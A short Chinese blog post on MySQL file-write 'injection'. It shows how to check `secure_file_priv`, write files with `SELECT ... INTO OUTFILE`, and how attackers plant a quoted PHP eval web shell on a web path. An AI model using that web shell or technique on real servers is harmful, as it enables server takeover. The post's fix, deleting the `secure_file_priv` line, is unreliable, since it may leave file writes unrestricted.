SQL之文件注入

①:首先连接上数据库

:执行SQL语句show variables like '%secure%';查询是否可以注入

③:对照表查看是否可注入

clipboard.png

④:发现可注入执行 select '注入的内容' INTO OUTFILE 'C:\\Users\\Administrator\\Desktop\\test.txt';(注入到桌面的SQL)

:网络上的有些大佬也是通过扫描数据库使用弱口令拿到你的数据库然后通过数据库注入木马,从而拿下你的服务器。

例如向你的网站指定路径注入(<?php @eval($_POST[test])?>)这段php木马。

⑥:解决方法

打开数据库my.cnf或my.ini,

然后删除secure_file_priv这句。

转载请注明出处凌夕博客 »漫小猫原文地址《SQL之文件注入

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(1)

文章不错非常喜欢
新闻 UBrowser 8.7 Windows 7 1年前 (2018-11-21) 回复
福建省福州市 电信福建省福州市 电信